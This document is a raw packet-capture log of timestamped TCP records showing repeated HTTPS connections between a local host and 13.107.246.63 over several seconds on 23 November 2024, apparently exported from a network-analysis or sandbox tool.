                                                                                                                                                                                  Nov 23, 2024 19:53:43.324809074 CET49999443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:43.324892044 CET49999443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:43.324907064 CET4434999913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:43.324919939 CET49999443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:43.324925900 CET4434999913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:43.328186989 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:43.328219891 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:43.328300953 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:43.328516006 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:43.328530073 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.596792936 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.597393990 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:44.597420931 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.597784996 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:44.597793102 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.655107975 CET4435000113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.655637980 CET50001443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:44.655651093 CET4435000113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.655996084 CET50001443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:44.656001091 CET4435000113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.664134979 CET4435000013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.664472103 CET50000443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:44.664480925 CET4435000013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.664854050 CET50000443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:44.664858103 CET4435000013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.738368034 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.738949060 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:44.738961935 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:44.739702940 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:44.739706039 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.221685886 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.222558975 CET4435000113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.222630024 CET4435000113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.222790956 CET50001443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.222790956 CET50001443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.222790956 CET50001443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.224833012 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.224952936 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.224989891 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.225131989 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.225363970 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.225369930 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.225415945 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.225420952 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.227771044 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.227817059 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.227888107 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.228055000 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.228071928 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.228312969 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.228338957 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.228398085 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.228497982 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.228509903 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.330584049 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.330749989 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.330816031 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.330897093 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.330907106 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.330915928 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.330919981 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.333703995 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.333750010 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.333872080 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.334033966 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.334049940 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.339859009 CET4435000013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.339880943 CET4435000013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.339922905 CET4435000013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.339956999 CET50000443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.339971066 CET50000443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.340148926 CET50000443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.340148926 CET50000443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.340157032 CET4435000013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.340166092 CET4435000013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.342319965 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.342382908 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.342469931 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.342608929 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.342641115 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.410486937 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.410984039 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.411004066 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.411432981 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.411439896 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.443218946 CET50001443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.443228960 CET4435000113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.909003973 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.914438963 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.914490938 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.914561033 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.914638042 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.914638042 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.917391062 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.917388916 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.917399883 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.917402029 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:45.917485952 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.917623043 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:45.917634964 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.159815073 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.160605907 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.160629988 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.161190033 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.161195040 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.221390963 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.222923040 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.222929955 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.223336935 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.223342896 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.256457090 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.256932020 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.256997108 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.257586002 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.257600069 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.611891985 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.614744902 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.614818096 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.614895105 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.614905119 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.614917040 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.614922047 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.619697094 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.619781017 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.619853973 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.620003939 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.620024920 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.686196089 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.693370104 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.693548918 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.693550110 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.693550110 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.696806908 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.696846008 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.696932077 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.697118044 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.697132111 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.717308044 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.721417904 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.721509933 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.721587896 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.721587896 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.721630096 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.721656084 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.723807096 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.723826885 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:47.723905087 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.724064112 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:47.724072933 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.006021023 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.006045103 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.025659084 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.026276112 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.026293993 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.026809931 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.026813984 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.586380005 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.591501951 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.591552973 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.593607903 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.593616962 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.602448940 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.602463007 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.602530956 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.603811026 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.603826046 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.661921024 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.662560940 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.662583113 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:48.663177967 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:48.663183928 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.145242929 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.152658939 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.152832031 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.152832031 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.152832031 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.155991077 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.156029940 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.156102896 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.156253099 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.156267881 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.401036024 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.401767969 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.401812077 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.402445078 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.402457952 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.459222078 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.459249020 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.463044882 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.463560104 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.463589907 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.464107037 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.464118958 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.622556925 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.623063087 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.623084068 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.623806000 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.623811007 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.834213972 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837620974 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837701082 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837727070 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837780952 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837836981 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837877035 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837877035 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837896109 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.837917089 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.841406107 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.841437101 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.841517925 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.841686010 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.841694117 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.902066946 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.905518055 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.905579090 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.905630112 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.905643940 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.905654907 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.905659914 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.908869982 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.908917904 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:49.908979893 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.909181118 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:49.909195900 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.087372065 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.092297077 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.092350960 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.092541933 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.092541933 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.092541933 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.092542887 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.095629930 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.095668077 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.095742941 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.095887899 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.095899105 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.401911020 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.401942015 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.445503950 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.446078062 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.446084976 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.446585894 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.446590900 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.913167953 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.913233995 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.913292885 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.913535118 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.913542032 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.913552046 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.913556099 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.917267084 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.917303085 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:50.917409897 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.917593956 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:50.917607069 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.122848034 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.123713017 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.123733997 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.125118017 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.125124931 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.795661926 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.795742989 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.795851946 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.795866013 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.795887947 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.795970917 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.796374083 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.796384096 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.796405077 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.796411037 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.799952030 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.799989939 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.800067902 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.800204039 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.800216913 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.931108952 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.932064056 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.932090998 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.932612896 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.932625055 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.932629108 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.932878971 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.932898045 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.933351994 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.933357954 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.955521107 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.956060886 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.956073999 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:51.956546068 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:51.956549883 CET4435001713.107.246.63192.168.2.7
